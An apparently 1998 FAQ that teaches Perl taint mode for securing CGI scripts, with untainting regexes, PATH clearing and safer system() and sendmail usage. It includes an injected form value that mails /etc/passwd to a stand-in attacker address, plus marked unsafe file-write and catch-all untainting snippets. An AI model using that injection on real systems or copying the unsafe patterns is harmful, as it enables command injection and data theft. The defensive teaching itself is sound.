Gunther Birznieks
<gunther@clark.net>
Version 1.0, June 3, 1998
What is taint mode? Why do I need it?
Freeware CGI Scripts are available for download all over the Web.
But how many of them are really
secure? When you download a script do you check all the logic to make
sure it is secure? Do you read through each line of code and anticipate
all the ramifications? Most of the time the answer is "no". After all,
the whole point of downloading software is to get it and run it for free
WITHOUT having to do a lot of work.
I'm writing this to tell you that there isn't any free lunch out there. The more
complicated a CGI script is, the more likely you will want to find someone
else who has already programmed it and avoid doing the work yourself.
The problem is that
regardless of how good the author is, every large program has a good
probability of having bugs -- some of them may be security bugs.
One very good way to lock out security bugs in Perl code is to turn on
TAINT mode. TAINT mode puts a Perl script into "PARANOID" mode and treats
ALL user supplied input as tainted and bad unless the programmer
explicitly "OKs" the data.
How do I use taint mode in my CGI/Perl script?
If your site has Perl 5 on it, change the line at the top of your CGI
script from
#!/usr/local/bin/perl
to
#!/usr/local/bin/perl -T
Note: your path to the Perl executable may vary depending on your server.
If your site has Perl 4 on it, change the line at the top of your CGI
script from
#!/usr/local/bin/perl
to
#!/usr/local/bin/taintperl
Notice that Perl 4 does not support the -T flag. Instead, Perl 4
distributions typically come with a separate executable altogether,
"taintperl".
Windows NT and other non-UNIX Web servers may have trouble
recognizing the first magical line of a Perl script. Executing
the first line of a script with the command parameters in there
is a UNIXism. Read the next section for issues involved in activating
taint mode on WinNT, Win95/98, or Mac.
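To confirm that the flag actually took effect, a script can report its own taint status. The following is a minimal sketch, assuming Perl 5.8 or later, where the read-only built-in variable ${^TAINT} is available; the taint_status name is made up for illustration. Run it once as "perl -T script.pl" and once without -T to see the difference.

```perl
use strict;

# Report how this script was started.
# ${^TAINT} is 1 under -T, -1 under -t (taint warnings only), 0 otherwise.
sub taint_status {
    return "on"            if ${^TAINT} == 1;
    return "warnings only" if ${^TAINT} == -1;
    return "off";
}

print "Taint mode is ", taint_status(), "\n";
```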
How do I activate taint mode on non-UNIX servers?
CGI scripts running on non-UNIX servers typically do not recognize
the magical #!/usr/local/bin/perl first line of the script. Instead,
the web server knows what language to execute the script with because
of an operating system or web server configuration variable.
For example, for IIS on NT, you should change the association of Perl
scripts to run with taint mode on. Unfortunately, this changes the association
for ALL your Perl scripts which you may not want.
A more reasonable way is to get around the problem
by creating a second extension under NT such as
tcgi or tgi and associate it with taint mode Perl.
Then, rename the scripts with the new extension to activate
taint mode on them.
You could also try using another web server that understands
the first line of scripts. For example, SAMBAR v4.1, a freeware
NT web server, can be configured to run the script based on the
first line of the cgi script. In this case, you would change the
first line to read something like the following:
#!c:\perl\bin\perl.exe -T
Once I activate taint mode is that it?
Unfortunately, no.
You should test your script thoroughly to see if
turning on taint mode stops anything from working. Usually the majority
of your script will work fine. In fact if you are lucky, the whole
program may work without any changes at all!
The major caveat is that taint mode is not a compile time check.
It is a run-time check.
Run-time checking means that taint mode Perl is constantly and vigilantly
checking to see if the script is going to do anything unsafe with user
input while the program runs. It does not stop checking after the script
first compiles (compile-time checking).
Run-time checking means that you need to test all logical paths of execution
your script might take so that "legal operations" do not get halted
because of taint mode.
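One way to exercise each path during testing is to wrap it in eval and look for the fatal error that taint mode raises. The sketch below assumes Perl 5; the helper name taint_failure is hypothetical. It relies on the fact that taint errors are run-time errors whose message begins with "Insecure" (for example, "Insecure dependency in open while running with -T switch").

```perl
use strict;

# Run one code path and report whether taint mode rejected it.
# Returns the error text for a taint failure, "" if the code ran cleanly.
# Any other kind of error is passed along unchanged.
sub taint_failure {
    my ($code) = @_;
    my $ok = eval { $code->(); 1 };
    return "" if $ok;
    die $@ unless $@ =~ /^Insecure/;
    return $@;
}

# Example: a path that performs no unsafe operation.
my $problem = taint_failure(sub { return length("just a string") });
print $problem eq "" ? "no taint failure\n" : "taint failure: $problem";
```

Calling the helper once for every branch of the script gives a quick list of the places that still need untainting.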
OK, So what are the details of what I need to change?
To get an introduction to some basic cases of what taint mode considers
"unsafe", I recommend reading the Perl documentation on taint mode.
The O'Reilly "Programming Perl" reference book is a good introductory source of
information. The section in the book is called "Handling Insecure Data".
The same basic information in there can also be found
on-line in the UNIX distribution of Perl. On UNIX,
typing "perldoc perlsec" will bring up the Perl Security
documentation.
If you are not using UNIX, there is a possibility that this
command will work on your particular operating system's
distribution of Perl anyway. However, if it does not
work, you can always look up this information on-line. The "perlsec"
guide is located at
http://www.perl.com/CPAN/doc/manual/html/pod/perlsec.html.
In addition, Lincoln Stein's
WWW-Security FAQ has an excellent introduction to safe scripting in
Perl.
On a CGI script, the only user input is basically user submitted form
data. It is this user input that the Perl script will consider "tainted".
This does NOT mean that you have to immediately jump through a lot of hoops
to untaint ALL the form variables that come in. Not only would that be a
big pain, but it's unnecessary.
Instead, Perl only considers the COMBINATION of form variables plus the
use of a potentially "unsafe" operation to be illegal. Potentially "unsafe"
operations are operations that have a potentially permanent destructive
effect if the wrong parameters are passed.
Potentially unsafe operations include, but are not
necessarily limited to, system calls of any sort such as using system(),
backticks or piped open() calls, open calls that can write to disk,
unlink() which deletes files, and rename().
For the sample code given, it is assumed that the associative array %form_data
contains the form data that was passed to the CGI script where the key is the
field name and the value is the value of the HTML Form field.
Since this FAQ is meant to be useful for both Perl 4 and 5, I have not used
CGI.pm syntax. If you are using Perl 5 and CGI.pm as your library, your tainted
variables would be coming out of $query->param() method in the CGI object.
I use "mail" as an example program, but really the examples here apply to any system
call with command line parameters. If you actually want to email from CGI scripts
you may want to consider the more secure method described further in the
system call section of this FAQ.
For example, if $form_data{"email"} is "tainted", then the following would
still be legal:
print $form_data{"email"} . "\n";
because the print command is not an unsafe operation.
But if you try to pass the same variable to an unsafe version
of a system call
system("mail " . $form_data{"email"});
Perl will complain and not allow this. Making an unsafe system call
plus passing form data as a command line argument is
terribly unsafe. Consider what
would happen if someone entered an email address on the form like
"me@mydomain.com; mail hacker@hack.net < /etc/passwd"
Clearly, there are security ramifications. With taint mode turned on
though, the Perl interpreter will stop this from occurring at all. However,
Perl can't tell what is in the form_data variable -- it just assumes it is
tainted whether it is friendly or not.
Thus, if you want to do that type of command with a user supplied variable,
you must always untaint it regardless of whether it contains harmless input or
not. Remember, Perl only sees that the string was created as a result of
user input (such as a form variable). It has no way of knowing whether the
string is safe or not until you untaint it with the techniques listed here.
Even HIDDEN form tags which are not directly entered
by a user are considered tainted by Perl. In other words, all form
data passed to the CGI script is considered tainted by Perl.
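If you are curious which values Perl currently regards as tainted, you can ask it. This is a minimal sketch, assuming Perl 5.8 or later, where the Scalar::Util module and its tainted() function ship with Perl; taint_report is a made-up helper name, and $ENV{"PATH"} merely stands in for form data because every environment value is tainted under -T.

```perl
use strict;
use Scalar::Util qw(tainted);

# Describe each named value as TAINTED or clean.
# Without -T, tainted() always returns false, so everything reads "clean".
sub taint_report {
    my (%values) = @_;
    my @lines;
    foreach my $name (sort keys %values) {
        my $state = tainted($values{$name}) ? "TAINTED" : "clean";
        push @lines, "$name: $state";
    }
    return @lines;
}

my $outside = defined $ENV{"PATH"} ? $ENV{"PATH"} : "";
print "$_\n" foreach taint_report("from_outside" => $outside,
                                  "from_program" => "fixed text");
```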
To untaint a variable, you use regular expressions
The only way to untaint a variable is to do a regular
expression match using () groups inside the regular expression
pattern match.
In Perl, the first () group match gets assigned to $1, the
second () group to $2, and so on.
Perl considers these new
variables that arise from () groups to be untainted. Once
your regular expression has created these variables, you
can use them as your new untainted values.
The following will illustrate this:
Email addresses consist of word characters (a-zA-Z_0-9), dashes, periods and an
@ sign. So we want to match this descriptive template. But there is a catch!
Email addresses may contain dashes, and a lot of programs use a dash to
signify a command-line parameter! So although we allow dashes in the email
address, if you want to be extra careful, make sure that the first character of
the email address is a word character and not a dash or period. The likelihood
that someone really has an email address that begins with a period or dash is relatively low unless
they are the singer formerly known as Prince.
Thus, our descriptive template becomes the following:
- Match first character as a word character, no extra ones allowed like dashes.
- Match 0 or more subsequent characters as word characters which can also include
dashes and periods.
- Match exactly one @ symbol after the preceding two rules.
- Match every character (at least one) for the domain name of the email server
after the @ symbol. This can consist of word characters, dashes, and periods.
The regular expression for this template minus the grouping () we would use for
untainting is:
/\w{1}[\w-.]*\@[\w-.]+/
Further, let us assume that somewhere in the program a variable called
$email has been assigned from $form_data{"email"} which contains a value
submitted by the user from an HTML form using a statement like the following:
$email = $form_data{"email"};
Notice that $email is now tainted as well. This is because its value arose
directly from another variable that contained tainted (user input) data,
namely $form_data{"email"}.
So to untaint a variable called $email, you would do the following
with a regular expression.
if ($email =~ /(\w{1}[\w-.]*)\@([\w-.]+)/) {
    $email = "$1\@$2";
} else {
    # log the rejected value and the address it came from
    warn ("TAINTED DATA SENT BY $ENV{'REMOTE_ADDR'}: $email");
    $email = ""; # successful match did not occur
}
OK. Let's go over this in a little more detail.
Basically, when you use
() inside a regular expression, each group of parentheses is mapped to a
numbered variable ($1, $2, and so on) in the order in which the groups appear.
For example, the first set of parentheses that matches in the
regular expression is referred to as $1.
In the above example, the first parentheses surround (\w{1}[\w-.]*).
This matches a single word character (no dashes or periods allowed)
followed by zero or more word characters, dashes, and periods.
Because of the parentheses, this first match gets assigned
to $1 by Perl.
Then, an @ symbol is matched.
Finally, the second set of
parentheses ([\w-.]+) matches one or more of any word characters, dashes, and
periods. This second match gets assigned to $2 by Perl.
If the regular expression is successful, $1 (first parenthetical match)
will equal the username portion of the email address and $2 (second
parenthetical match) will equal the domain portion.
Thus, the next command, $email = "$1\@$2"; replaces the
previously tainted email variable with the safe counterparts:
$1 followed by an @ symbol followed by $2.
Notice that $1 and $2 are both considered untainted now. This
is very important to see.
Yes, they did
arise from the user input data, but Perl considers these variables
special. Perl basically believes that because they resulted
from a regular expression you set up, that you have explicitly
checked the data for validity in that regular expression. Thus, $1
and $2 are not considered tainted.
On the other hand, if the user entered an email address that did not match this
"template", the regular expression will fail and Perl will not set $1 and $2
from this input. The example above would assign $email = "" in this case
as part of the else {} clause.
Of course, if the user is trying to hack your system, this is a good
thing. You only want valid email addresses to come through. You should
generally check for the failure of the regular expression as was done
above by the else {} clause and do something about the bad data.
As an additional plus, checking for the failure of the regular expression
allows you to use something like warn to print an informational message to STDERR
about the variable that did not pass along with the IP address that tried to pass
it as I have done in the above example.
When a CGI script prints to STDERR, that
output goes to your errorlog. You should always check your errorlog for
potential hack attempts. Of course, you could always be more sophisticated
and email the bad data directly to yourself so you would be notified right away.
Also, if you are really worried about your
program's integrity, you could use die() instead of warn() to stop the program
rather than quietly warning you.
If you are doing more than one taint check and a later
check fails, the numbered variables (e.g. $1 or $2) are not
cleared. They keep the values from the last successful match.
Unless you are sure that this is the only
variable you are taint checking, it is best to
check the match with an if/else statement as
demonstrated above.
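When several fields need the same check, the match and its if/else test can be wrapped in a subroutine so that a stale $1 can never leak through. The following is a sketch only, assuming Perl 5; untaint_email is a hypothetical name. It also makes one change to the pattern discussed above, which is an assumption on my part rather than part of the original example: the ^ and \z anchors make the whole value fit the template, so input with extra characters is rejected instead of being trimmed down to the part that matches.

```perl
use strict;

# Return an untainted copy of an email address, or undef if the
# value does not fit the template from start to end.
sub untaint_email {
    my ($email) = @_;
    return undef unless defined $email;
    if ($email =~ /^(\w[\w.-]*)\@([\w.-]+)\z/) {
        return "$1\@$2";    # built only from the captured groups
    }
    return undef;           # never fall back to an older $1 or $2
}

my %form_data = ("email" => 'me@mydomain.com; mail hacker@hack.net < /etc/passwd');
my $email = untaint_email($form_data{"email"});
if (defined $email) {
    print "Accepted: $email\n";
} else {
    my $ip = defined $ENV{"REMOTE_ADDR"} ? $ENV{"REMOTE_ADDR"} : "unknown";
    warn "Rejected email value from $ip\n";
}
```

Returning undef on failure forces the caller to test the result, which is the same discipline as the if/else in the example above.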
Do I have to untaint all my variables?
No.
Both of the following must happen before you have to worry
about untainting a variable.
[1] The variable was assigned based on user input. Or the
variable was assigned from a variable that was tainted itself.
AND
[2] The variable will be used in a way that could compromise
system safety such as writing a file.
For example, the following is OK because printing to the STDOUT
is not an unsafe operation even though the variable came from
a form variable.
# %form_data contains an associative array
# of values the user entered on a form
#
# This is SAFE, printing is a safe operation
# regardless of user input or not.
#
$filename = $form_data{"session_file"};
print "The filename was $filename\n";
In addition, the following is OK, because although the file
is being opened for writing (a potentially unsafe operation),
the filename variable was assigned within the program NOT as a
result of user input.
# SAFE, FILENAME is assigned in the program itself
$filename = "./TempFiles/mytempfile.dat";
open (TEMP, ">$filename") || die "Cannot open $filename: $!";
However, the following IS unsafe because the variable came from
user input AND it is being used in a potentially unsafe operation --
opening a file for writing.
Note that opening a file for writing is unsafe
because a malicious filename could tell the
script to write over ANY file on the system that the web server
has permission to modify, which is a huge security hole.
# UNSAFE!!! Taint Will Complain!
$filename = $form_data{"session_file"};
open (SESSION, ">$filename");
The easiest way to test if taint mode is having a problem
with a particular form variable is to simply activate taint mode
as described earlier and then test the program.
Any errors that result in the script not executing will be caught
and logged in your web server's errorlog. This should be the number
one place you look at to troubleshoot taint mode.
Here are some common unsafe operations which will stop the Perl program
from executing if user input used with them is not untainted first:
- Unsafe system() calls (discussed as a special case below).
- require()ing library files
- Anything that writes to the file system such as open
with > or >>, unlink, rename
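The unsafe open() shown earlier in this section can be made acceptable by untainting the file name first. Here is a minimal sketch, assuming Perl 5 and assuming that session files live in one fixed directory and have simple names; untaint_filename and the ./TempFiles directory are illustrative choices, not requirements. The pattern allows no slashes at all and no leading period, so the value cannot point outside the chosen directory.

```perl
use strict;

# Return an untainted file name, or undef if the name contains
# anything other than word characters, dashes, and periods.
sub untaint_filename {
    my ($name) = @_;
    return undef unless defined $name;
    return $name =~ /^(\w[\w.-]*)\z/ ? $1 : undef;
}

my $session_dir = "./TempFiles";          # fixed by the program, never by the user
my $requested   = "../../etc/passwd";     # what a hostile form might send
my $filename    = untaint_filename($requested);

if (defined $filename) {
    # open (SESSION, ">$session_dir/$filename") would now pass taint checks
    print "Would write to $session_dir/$filename\n";
} else {
    warn "Rejected session file name\n";
}
```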
If I "know" my variable is safe, why don't I just clear taint mode?
DON'T DO THIS!!!
Perl probably has a good reason for thinking the input is
unsafe. For example, there is a common misconception that HIDDEN INPUT
tags on a FORM that are generated by a CGI script are "safe". This is not
true! A user could easily mimic your form by making their own HTML form
with bogus values.
Taint mode will catch all this. Avoid the temptation to quickly dismiss a
tainted variable by using an "open" Regular expression.
THE FOLLOWING IS BAD AND SHOULD NOT BE DONE:
$email =~ /(.*)/;
$email = $1;
This will match ANY expression. Thus, effectively no check
has actually been done.
Recall that Perl considers $1 to be safe now because it trusts that you
tested the validity of the variable using the regular expression. Perl
does not judge your regular expression. If you choose to make it too loose
like the above regular expression, then Perl will let you.
If you do this, you are shortchanging the point of taint mode which is to
make you sit down and think "What input do I really want and how do I
restrict myself to JUST that set of characters?".
How do I fix system() calls in taint mode?
When you make a system call to an external program or use its sister
command, exec, taint mode also
stops this from happening if the PATH has not been adjusted. Since
the command is passed to the system call as a string, Perl cannot easily
tell whether it names a relative or an absolute path to a command.
Being in "paranoid" mode, Perl stops the command from executing.
The way around this problem is to clear the PATH environment variable so
that Perl can trust that the command passed as a system call is an
absolute path to a command instead of being part of the search path.
You might ask "What is unsafe about the path?". Historically, paths are
considered unsafe because if there are multiple versions of an executable,
it is difficult to tell which one is actually being executed. If there is a
bug in one of the versions, then this can pose a security hazard.
Basically, before doing a system call, clear the PATH by issuing a
statement like the following
$ENV{"PATH"} = "";
Note, this does not just apply to the system() call. It also applies to
opening up files with the | symbol (which executes a command) or using
backticks `` to execute an external command. Of course, now you will need
to call the command using an absolute path.
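The cleanup can be collected into one small routine that runs before any external command. This is a sketch, assuming Perl 5; clean_environment is a hypothetical name. Besides PATH, it deletes four other environment variables that the perlsec documentation recommends removing because shells may act on them.

```perl
use strict;

# Make the environment safe for running external commands.
sub clean_environment {
    $ENV{"PATH"} = "";                          # no search path, as described above
    delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};   # other variables a shell may honor
    return;
}

clean_environment();
print "PATH is now '$ENV{PATH}'\n";
```

If your scripts need a search path after all, setting PATH to a short list of trusted directories that you write into the program yourself also satisfies taint mode.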
By the way, some system calls are more secure than others. The example
given before, system("mail $email"), is insecure. Behind the
scenes, Perl takes a single string argument to system() and passes it
to a shell for parsing if it contains any shell metacharacters.
But system("mail", $email) is more secure because it does not spawn a
shell to execute the command. The reason it does not spawn a shell is that
the programmer has already split the command into separate arguments. Thus,
Perl does not bother passing the string to a shell for processing, and
the $email variable will not have a chance of being
executed as a command as part of the shell processing step.
I strongly advise untainting the variables passed to system() even
if you use the "safer" separated arguments version of the system() call.
It is entirely possible that the program you are calling via
a system() call actually calls other programs or uses
the data passed to it in an unsafe way. In turn those programs may
call other programs very much like the Russian dolls that
expose yet another doll every time one is opened.
It doesn't take much
extra coding to untaint variables and be "safe rather than sorry".
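The difference between the two forms of system() is easy to see in a small experiment. The sketch below assumes Perl 5 and, so that it can run on any machine, uses the running Perl interpreter ($^X) as a stand-in for an external program such as mail; run_list is a made-up helper name. It is meant to be tried without -T; under taint mode the PATH cleanup and untainting described above still apply.

```perl
use strict;

$| = 1;    # keep our output in order with the child's output

# Run a program with its arguments given as a list, so no shell is
# involved. Returns the program's exit code, or -1 if it could not start.
sub run_list {
    my (@command) = @_;
    die "need a program and at least one argument\n" if @command < 2;
    my $status = system(@command);
    return $status == -1 ? -1 : $status >> 8;
}

my $email = 'me@mydomain.com; echo INJECTED';
my $exit  = run_list($^X, "-e", 'print "argument received: $ARGV[0]\n"', $email);
print "exit code: $exit\n";
```

The called program receives the whole value, semicolon included, as one argument. Nothing after the semicolon is run as a separate command, which is exactly why the value should still be untainted before a real mail program sees it.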
Another quick security note. Typically instead of passing $email as a
parameter to mail, it is more secure to open up a pipe to the sendmail
program with a "-t" parameter. This makes sendmail read the To: and
From: email addresses from STDIN instead of from command line parameters. The
mail-lib.pl library from the
Selena Sol Scripts Archive uses this more
secure method of sending email.
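The pipe approach might look roughly like the following. This is a sketch under several assumptions and not the code from mail-lib.pl: it assumes Perl 5.8 or later (for the list form of a piped open), it assumes sendmail is installed at /usr/lib/sendmail, and the names build_message and send_message are invented here. As an extra precaution of my own, header values containing a line break are refused so that a form field cannot add headers.

```perl
use strict;

# Build the text that "sendmail -t" reads from STDIN.
# Returns undef if a header value is missing or contains a line break.
sub build_message {
    my ($to, $from, $subject, $body) = @_;
    foreach my $header ($to, $from, $subject) {
        return undef if !defined $header || $header =~ /[\r\n]/;
    }
    return "To: $to\nFrom: $from\nSubject: $subject\n\n$body\n";
}

# Pipe the message to sendmail without going through a shell.
# ASSUMPTION: sendmail lives at /usr/lib/sendmail on this server.
sub send_message {
    my ($message) = @_;
    local $ENV{"PATH"} = "";
    open(my $mail, "|-", "/usr/lib/sendmail", "-t") or return 0;
    print $mail $message;
    return close($mail) ? 1 : 0;
}

my $message = build_message('webmaster@example.com', 'form@example.com',
                            "Feedback", "Someone filled in the form.");
print $message;
# send_message($message) would hand the text to sendmail.
```

Because the addresses travel inside the message text, they never appear on a command line, although untainting them first is still worthwhile.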
How do I fix problems with require or use statements in taint mode?
The Perl require and use statements also change slightly when taint mode
is turned on. Basically, the path used to load libraries/modules no longer
includes "." (the current directory).
So if you load any libraries or modules relative to the current working
directory without explicitly specifying the path, your script will
break under taint mode.
To further illustrate this, normally you can read a setup file
in the current working directory in a CGI script
with a command like:
require "myscript.setup";
However, this will not work when taint mode is on.
Instead, you must tell
the require statement explicitly where to load the library since
"." is removed during taint mode from the @INC array.
@INC contains a list of valid paths to read library files and
modules from.
If taint mode is on, you would simply change the above
require code to the following:
require "./myscript.setup";
This lets Perl know that the myscript.setup will be explicitly
loaded from the current directory. Alternatively, you could
add the following command:
use lib qw(.);
"use lib" tells Perl to add the list of passed directory names
inside qw() to the @INC array.
You may be wondering why I advocate adding the capability
of loading relative libraries back into the script when
taint mode is turned on. After all, isn't taint mode doing
this to protect me? What is taint mode protecting?
Well, the issue with @INC is really more of a problem
with SUID scripts than CGI scripts. When you have an SUID script
that can execute with the permissions of another user (such as root),
Perl goes into taint mode automatically.
For this SUID script case, it would be a huge
security breach to have the capability of loading libraries from
the user's current directory. If a script ends up having a bug
where the library is not found in the normal directory path, then
a user could exploit this by writing their own, malicious version
of the library, putting it in the current directory, and running
the SUID script from their current directory.
However, this is not really the same problem with CGI scripts.
Users are not executing your script from arbitrary directories.
Your web server controls which directory the script is called from.
So keeping "." in @INC is not really a problem compared to SUID scripts
which operate under taint mode automatically.
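If you would rather not depend on the current directory at all, "use lib" also accepts an absolute directory. The following is a minimal sketch, assuming Perl 5; the directory /usr/local/apache/cgi-bin/lib is purely hypothetical and in_inc is a made-up helper. Note that from Perl 5.26 onward "." is left out of @INC by default even without taint mode, so being explicit about library locations pays off either way.

```perl
use strict;
use lib "/usr/local/apache/cgi-bin/lib";   # hypothetical absolute library directory

# Report whether a directory is on Perl's library search path.
sub in_inc {
    my ($dir) = @_;
    return scalar grep { $_ eq $dir } @INC;
}

print "library directory searched: ",
      (in_inc("/usr/local/apache/cgi-bin/lib") ? "yes" : "no"), "\n";
print "current directory searched: ",
      (in_inc(".") ? "yes" : "no"), "\n";
```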
Some more taint mode tips
1. Consider logging bad taint/regular expression matches
If your taint cleaning results in a bad regular expression match, you
might want to set up code to detect this and log it or email this fact to
you. That way, you can see if people are trying to hack your script.
2. Use the web server's errorlog
If you turn on taint mode and there is a problem occurring so the
script does not seem to work, you can find out the specifics behind the
problem by examining your server's errorlog. Encourage your ISP to help
you secure your scripts by giving you access to errorlogs if you don't
have it.
A smart ISP will encourage safe CGI scripting practices. If they don't,
you don't want that ISP since other users may be developing unsafe CGI
on your virtual web server.
3. There's more to safe CGI scripting than taint mode
Always be vigilant. There may be other holes. For example, the "Russian
Doll" scenario that I outlined above could get past taint mode.
Taint mode helps a LOT, but it is not the end of safe CGI scripting.
Always ask yourself, "Is there a way someone could break through this?"
4. Read other WWW Security references
Read the WWW-Security FAQ
by Lincoln Stein and other security
resources. Keeping up with the latest security issues is absolutely
crucial to promoting safe CGI.
Acknowledgements
The following have helped with the creation of this FAQ by
providing valuable feedback during its development: Anthony Masiello,
Joseph Ryan, Ignacio Bustamante, Fred Taheri, Mark McDonald, Dan Berkowitz,
Peter Chines, Selena Sol.